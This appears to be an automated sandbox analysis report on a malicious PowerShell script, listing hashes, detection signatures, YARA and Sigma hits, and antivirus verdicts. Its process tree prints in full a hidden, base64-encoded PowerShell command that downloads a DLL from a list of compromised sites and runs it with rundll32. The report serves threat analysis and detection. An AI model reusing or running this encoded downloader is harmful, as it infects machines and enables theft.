Loading ...

Play interactive tourEdit tour

Analysis Report ps_script.ps1

Overview

General Information

Sample Name:ps_script.ps1
Analysis ID:416466
MD5:afce2bf94f95c17bc64535f2a70a96d0
SHA1:eb88e2f97a2292d63d678963813a1999f69faa45
SHA256:9edaa045dc625024afee6ac6fd532fdb27d6beb607588c326babdba0b439d602
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • powershell.exe (PID: 5496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5344 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4AJwArACcALwBTACcAKQArACgAJwAvACcAKwAnAEAAJwArACcAXQBhAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoALwAvACcAKwAnAGUAdABkAG8AZwAuAGMAbwAnACsAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG4AJwArACcAdQAvAEAAJwApACsAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACcAcwAnACsAKAAnADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaABpAG4AdAB1ACcAKwAnAHAALgBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGMAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACkAKwAoACcAdAAnACsAJwAvAGQARQAvACcAKwAnAEAAXQBhACcAKwAnAG4AdwBbADMAOgAvAC8AJwArACcAdwB3AHcALgAnACkAKwAnAHMAJwArACgAJwB0AG0AJwArACcAYQByAG8AdQBuAHMAJwArACcALgAnACkAKwAoACcAbgBzACcAKwAnAHcAJwApACsAKAAnAC4AJwArACcAZQBkAHUALgBhAHUALwBwACcAKwAnAGEAJwArACcAeQAnACsAJwBwAGEAbAAvAGIAOAAnACkAKwAoACcARwAnACsAJwAvAEAAXQAnACkAKwAoACcAYQAnACsAJwBuAHcAWwAnACkAKwAoACcAMwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwBtAC4AbQBjAGQAZQB2AGUAJwArACcAbABvAHAALgBuAGUAdAAnACsAJwAvACcAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAJwA2ACcAKwAoACcARgAyACcAKwAnAGcAZAAvACcAKQApAC4AIgBSAEUAYABwAGAAbABBAEMAZQAiACgAKAAoACcAXQBhACcAKwAnAG4AJwApACsAKAAnAHcAJwArACcAWwAzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAFAATABJAFQAIgAoACQAQwA4ADMAUgAgACsAIAAkAEMAdgBtAG0AcQA0AG8AIAArACAAJABGADEAMABRACkAOwAkAFEANQAyAE0APQAoACcAUAAnACsAKAAnADAAJwArACcANQBLACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABCAG0ANQBwAHcANgB6ACAAaQBuACAAJABCADkAZgBoAGIAeQB2ACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABTAHkAcwBUAGUAbQAuAG4ARQB0AC4AVwBFAEIAYwBMAEkAZQBOAFQAKQAuACIAZABvAGAAVwBOAGwAYABPAGEARABgAEYASQBsAEUAIgAoACQAQgBtADUAcAB3ADYAegAsACAAJABJAG0AZAAxAHkAYwBrACkAOwAkAFoAMQAwAEwAPQAoACcAQQA5ACcAKwAnADIAUQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASQBtAGQAMQB5AGMAawApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwA1ADYAOQA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEkAbQBkADEAeQBjAGsALAAoACgAJwBDAG8AJwArACcAbgB0ACcAKQArACcAcgAnACsAKAAnAG8AbAAnACsAJwBfAFIAdQBuAEQAJwArACcATAAnACkAKwAnAEwAJwApAC4AIgBUAGAATwBTAHQAYABSAGkATgBHACIAKAApADsAJABSADYANQBJAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAQgAnACkAKQA7AGIAcgBlAGEAawA7ACQASwA3AF8ASAA9ACgAJwBGADEAJwArACcAMgBVACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA1ADQASQA9ACgAKAAnAFYAOQAnACsAJwA1ACcAKQArACcATwAnACkA MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ps_script.ps1PowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x0:$s1: POwersheLL

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x524:$s1: POwersheLL
  • 0x7704:$s1: POwersheLL
  • 0x7944:$s1: POwersheLL
  • 0x79b4:$s1: POwersheLL
  • 0x7b84:$s1: POwersheLL
  • 0x7c2c:$s1: POwersheLL
00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell
00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn
Sigma detected: Suspicious PowerShell Parameter SubstringShow sources
Source: Process startedAuthor: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: ps_script.ps1Avira: detected
Antivirus detection for URL or domainShow sources
Source: http://www.hintup.com.brAvira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/2020/12/03/faqAvira URL Cloud: Label: phishing
